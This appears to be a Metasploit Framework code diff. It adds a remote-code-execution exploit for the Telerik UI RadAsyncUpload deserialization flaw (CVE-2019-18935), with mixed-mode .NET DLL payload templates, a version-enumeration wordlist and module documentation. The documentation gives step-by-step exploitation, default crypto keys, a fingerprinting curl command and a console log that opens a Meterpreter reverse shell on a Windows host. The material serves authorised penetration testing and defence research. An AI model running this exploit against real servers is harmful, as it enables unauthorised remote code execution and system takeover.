rapid7 · wvu · Oct 20, 2020 · Oct 5, 2020 · Oct 5, 2020 · Sep 30, 2020
diff --git a/data/templates/src/pe/dll/template.c b/data/templates/src/pe/dll/template.c
diff --git a/data/templates/src/pe/dll/template.def b/data/templates/src/pe/dll/template.def
diff --git a/data/templates/src/pe/dll/template.h b/data/templates/src/pe/dll/template.h
diff --git a/data/templates/src/pe/dll/template.rc b/data/templates/src/pe/dll/template.rc
diff --git a/data/templates/src/pe/dll_mixed_mode/README.md b/data/templates/src/pe/dll_mixed_mode/README.md
@@ -0,0 +1,23 @@
+# DLL Mixed Mode
+This is a [Mixed Mode Assembly][1], it allows a native payload from Metasploit
+to be executed from within what is the bare minimum requirements of a valid .NET
+assembly. The DLL source code is the same as the [standard DLL][2] template, the
+primary difference from a file perspective is that this DLL has the necessary
+manifest information to be loaded as a managed assembly.
+
+## Building
+Use the provided `build.bat` file, and run it from within the Visual Studio
+developer console. The batch file requires that the `%VCINSTALLDIR%` environment
+variable be defined (which it should be by default). The build script will
+create both the x86 and x64 templates before moving them into the correct
+folder. The current working directory when the build is run must be the source
+code directory (`dll_mixed_mode`).
+
+## References
+
+* https://github.com/bao7uo/MixedUp
+* https://thewover.github.io/Mixed-Assemblies/
+
+
+[1]: https://docs.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=vs-2019
+[2]: https://github.com/rapid7/metasploit-framework/tree/master/data/templates/src/pe/dlli
diff --git a/data/templates/src/pe/dll_mixed_mode/build.bat b/data/templates/src/pe/dll_mixed_mode/build.bat
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj
+move *.dll ..\..\..
diff --git a/data/templates/src/pe/dll_mixed_mode/template.cpp b/data/templates/src/pe/dll_mixed_mode/template.cpp
@@ -0,0 +1,2 @@
+#pragma unmanaged
+#include "template.c"
diff --git a/data/templates/template_x64_windows_mixed_mode.dll b/data/templates/template_x64_windows_mixed_mode.dll
diff --git a/data/templates/template_x86_windows_mixed_mode.dll b/data/templates/template_x86_windows_mixed_mode.dll
diff --git a/data/wordlists/telerik_ui_asp_net_ajax_versions.txt b/data/wordlists/telerik_ui_asp_net_ajax_versions.txt
@@ -0,0 +1,100 @@
+# last updated 2020-10-07
+# see: https://www.telerik.com/support/whats-new/aspnet-ajax/release-history
+2020.3.915
+2020.2.617
+2020.2.512
+2020.1.219
+2020.1.114
+2019.3.1023
+2019.3.917
+2019.2.514
+2019.1.215
+2019.1.115
+2018.3.910
+2018.2.710
+2018.2.516
+2018.1.117
+2015.2.623
+2014.1.403
+2017.3.913
+2017.2.711
+2017.2.621
+2017.2.503
+2017.1.228
+2017.1.118
+2016.3.1027
+2016.3.1018
+2016.3.914
+2016.2.607
+2016.2.504
+2016.1.225
+2016.1.113
+2015.3.1111
+2015.3.930
+2015.2.826
+2015.2.729
+2015.2.604
+2015.1.225
+2015.1.204
+2014.3.1024
+2014.2.724
+2014.2.618
+2014.1.225
+2013.3.1324
+2013.3.1114
+2013.3.1015
+2013.2.717
+2013.2.611
+2013.1.417
+2013.1.403
+2013.1.220
+2012.3.1308
+2012.3.1205
+2012.3.1016
+2012.2.912
+2012.2.724
+2012.2.607
+2012.1.411
+2012.1.215
+2011.3.1305
+2011.31115
+2011.2915
+2011.2712
+2011.1519
+2011.1413
+2011.1315
+2010.31317
+2010.31215
+2010.31109
+2010.2929
+2010.2826
+2010.2713
+2010.1519
+2010.1415
+2010.1309
+2009.31314
+2009.31208
+2009.31103
+2009.2826
+2009.2701
+2009.1527
+2009.1402
+2009.1311
+2008.31314
+2008.31125
+2008.31105
+2008.21001
+2008.2826
+2008.2723
+2008.1619
+2008.1515
+2008.1415
+2007.31425
+2007.31314
+2007.31218
+2007.21107
+2007.21010
+2007.2918
+2007.1626
+2007.1521
+2007.1423
diff --git a/documentation/modules/exploit/windows/http/telerik_rau_deserialization.md b/documentation/modules/exploit/windows/http/telerik_rau_deserialization.md
@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI
+ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly
+DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic
+keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes
+these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in
+the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').
+
+### Version Reference
+
+| Version                 | CVE-2017-11317                                  | CVE-2019-18938                    |
+| ----------------------- | ----------------------------------------------- | --------------------------------- |
+| < 2011.1.315            | Unknown                                         | Unknown                           |
+| 2011.1.315 - 2017.2.621 | Vulnerable (unless patched and RAU is disabled) | Vulnerable                        |
+| 2017.2.711 - 2019.3.917 | Configuration-dependent                         | Vulnerable                        |
+| 2019.3.1023             | Configuration-dependent                         | Configuration-dependent (opt-in)  |
+| > 2020.1.114            | Configuration-dependent                         | Configuration-dependent (default) |
+
+* [https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload][1]
+* [https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization][2]
+
+### Configuring Telerik UI ASP.NET AJAX
+Starting in version 2020.1.114, the application must be configured to be vulnerable by making changes to its XML
+configuration file (`web.config`). For the live demos included within the Telerik UI trial version, this file is located
+at `C:\Program Files (x86)\Progress\Telerik UI for ASP.NET AJAX R3 2020\Live Demos\web.config`. Within this
+configuration file is the `appSettings` node. To make the instance vulnerable, add the following within this section and
+restart the application if necessary:
+
+```
+  &lt;appSettings&gt;
+    &lt;!-- Configured to replicate CVE-2017-11317 --&gt;
+    &lt;add key=&quot;Telerik.AsyncUpload.ConfigurationEncryptionKey&quot; value=&quot;PrivateKeyForEncryptionOfRadAsyncUploadConfiguration&quot;/&gt;
+    &lt;add key=&quot;Telerik.Upload.ConfigurationHashKey&quot; value=&quot;PrivateKeyForHashOfUploadConfiguration&quot;/&gt;
+    &lt;!-- Configured to replicate CVE-2019-18935 --&gt;
+    &lt;add key=&quot;Telerik.Upload.AllowedCustomMetaDataTypes&quot; value=&quot;System.Configuration.Install.AssemblyInstaller&quot;/&gt;
+    &lt;!-- ... include the remaining configuration options --&gt;
+```
+
+## Verification Steps
+
+Exploitation of this vulnerability requires knowledge of two things, the crypto keys (see the details for the
+`RAU_ENCRYPTION_KEY` and `RAU_SIGNING_KEY` options) and the Telerik RAU ASP.NET AJAX version (see the details for the
+`VERSION` option).
+
+1. Start msfconsole
+1. Do: `use exploit/windows/http/telerik_rau_deserialization `
+1. Set the `RHOSTS` and `PAYLOAD` options
+1. Set any additional options as required by the previously selected payload
+1. Optionally set the `VHOST`, `RPORT` and `SSL` options as appropriate
+1. Set the `VERSION` option if it is known
+1. Run the exploit
+
+The DLL file which is written to disk and executed via the deserialization flaw will remain loaded and thus can not be
+cleaned up automatically by Metasploit.
+
+## Options
+
+### RAU_ENCRYPTION_KEY
+The encryption key for the RAU configuration data. This setting can be changed [starting in version 2017.1.118][1.1] by
+specifying the `Telerik.AsyncUpload.ConfigurationEncryptionKey` key within the `appSettings` section of the applications
+`web.config` XML file. The default value per CVE-2017-11317 is `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration`.
+
+### RAU_SIGNING_KEY
+The signing key for the RAU configuration data. This setting can be changed [starting in version 2017.1.118][1.1] by
+specifying the `Telerik.Upload.ConfigurationHashKey` key within the `appSettings` section of the applications
+`web.config` XML file. The default value per CVE-2017-11317 is `PrivateKeyForHashOfUploadConfiguration`. Versions older
+than 2017.1.118 do not utilize signing.
+
+### VERSION
+
+The Telerik UI ASP.NET AJAX version. If this value is not specified, the module will attempt to enumerate it through a
+series of requests using all known version numbers. This enumeration will fail if the correct crypto keys are not set.
+
+Alternatively, the version information can sometimes be identified without authentication.
+
+> If the application using RadAsyncUpload does not require authentication, then you can usually find the UI version
+> buried somewhere in the HTML source of the application's home page. The location of the version string isn't
+> consistent, though, so the best method of locating it is to use Burp to search for the regular expression
+> `20[0-9]{2}(\.[0-9]*)+` (and make sure you check the "Regex" box). You can also accomplish this with cURL:
+>
+> `curl -skL <HOST> | grep -oE '20[0-9]{2}(\.[0-9]*)+'`
+>
+> If that doesn't work, you can alternatively search for the string `<script src="/WebResource` to identify any
+> JavaScript files that are included in the site's home page. Choose one of the static resources there and examine its
+> `Last-Modified` date in the HTTP response header; that date should roughly match the release date of the software. For
+> example, a JavaScript resource bundled with UI for ASP.NET AJAX Q1 2013 (v2013.1.220, released on February 20, 2013)
+> will read `Last-Modified: Wed, 20 Feb 2013 00:00:00 GMT` in the HTTP response header for that file.
+
+*Source:* [https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui][3]
+
+### EXE::Custom
+*This is an advanced option.*
+
+Use custom exe instead of automatically generating a payload exe. If a custom payload executable is specified, it must
+be a [mixed mode assembly][4] DLL in order to be loaded through the deserialization technique.
+
+## Scenarios
+
+### Telerik UI ASP.NET AJAX v2020.3.915 on Windows 10
+
+This system was configured to be vulnerable through changes to the application's `web.config` file.
+
+```
+msf6 > use exploit/windows/http/telerik_rau_deserialization
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/telerik_rau_deserialization) > set RHOSTS 192.168.159.129
+RHOSTS => 192.168.159.129
+msf6 exploit(windows/http/telerik_rau_deserialization) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(windows/http/telerik_rau_deserialization) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf6 exploit(windows/http/telerik_rau_deserialization) > set VHOST win10dev
+VHOST => win10dev
+msf6 exploit(windows/http/telerik_rau_deserialization) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(windows/http/telerik_rau_deserialization) > check
+
+[*] Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect
+[*] Checking version: 2020.3.915
+[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
+[+] The Telerik UI ASP.NET AJAX version has been identified as: 2020.3.915
+[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
+[*] 192.168.159.129:8080 - The service is running, but could not be validated.
+[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
+msf6 exploit(windows/http/telerik_rau_deserialization) > set VERSION 2020.3.915
+VERSION => 2020.3.915
+msf6 exploit(windows/http/telerik_rau_deserialization) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(windows/http/telerik_rau_deserialization) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Uploaded 0 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
+[*] Server is using default crypto keys and is vulnerable to CVE-2017-11317
+[!] The service is running, but could not be validated.
+[+] Uploaded 29184 bytes to: C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp
+[*] Executing the payload...
+[*] Sending stage (175174 bytes) to 192.168.159.129
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:49466) at 2020-10-07 10:44:31 -0400
+[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
+[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
+[!] This exploit may require manual cleanup of 'C:\Windows\Temp\B9MWZKcH4FGUFEb1ioFQnZollFxhhl3Pr.dll.tmp' on the target
+
+meterpreter > getuid
+Server username: WIN10DEV\smcintyre
+meterpreter > sysinfo
+Computer        : WIN10DEV
+OS              : Windows 10 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+[1]:   https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
+[1.1]: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload#r1-2017-to-r2-2017-sp1
+[2]:   https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization
+[3]:   https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui
+[4]:   https://docs.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=vs-2019
diff --git a/lib/msf/util/dot_net_deserialization/assemblies.rb b/lib/msf/util/dot_net_deserialization/assemblies.rb
@@ -43,7 +43,8 @@ def to_s
   VERSIONS = {
     '4.0.0.0' => {
       'mscorlib' => StrongName.new('mscorlib', '4.0.0.0', 'b77a5c561934e089'),
-      'System' => StrongName.new('System', '4.0.0.0', 'b77a5c561934e089')
+      'System' => StrongName.new('System', '4.0.0.0', 'b77a5c561934e089'),
+      'System.Configuration.Install' => StrongName.new('System.Configuration.Install', '4.0.0.0', 'b03f5f7f11d50a3a')
     }
   }
 

diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -683,7 +683,12 @@ def self.to_win64pe_service(framework, code, opts = {})
   # @return           [String]
   def self.to_win32pe_dll(framework, code, opts = {})
     # Allow the user to specify their own DLL template
-    set_template_default(opts, "template_x86_windows.dll")
+    if opts.fetch(:mixed_mode, false)
+      default_exe_template = 'template_x86_windows_mixed_mode.dll'
+    else
+      default_exe_template = 'template_x86_windows.dll'
+    end
+    set_template_default(opts, default_exe_template)
     opts[:exe_type] = :dll
 
     if opts[:inject]
@@ -704,7 +709,12 @@ def self.to_win32pe_dll(framework, code, opts = {})
   # @return           [String]
   def self.to_win64pe_dll(framework, code, opts = {})
     # Allow the user to specify their own DLL template
-    set_template_default(opts, "template_x64_windows.dll")
+    if opts.fetch(:mixed_mode, false)
+      default_exe_template = 'template_x64_windows_mixed_mode.dll'
+    else
+      default_exe_template = 'template_x64_windows.dll'
+    end
+    set_template_default(opts, default_exe_template)
     opts[:exe_type] = :dll
 
     if opts[:inject]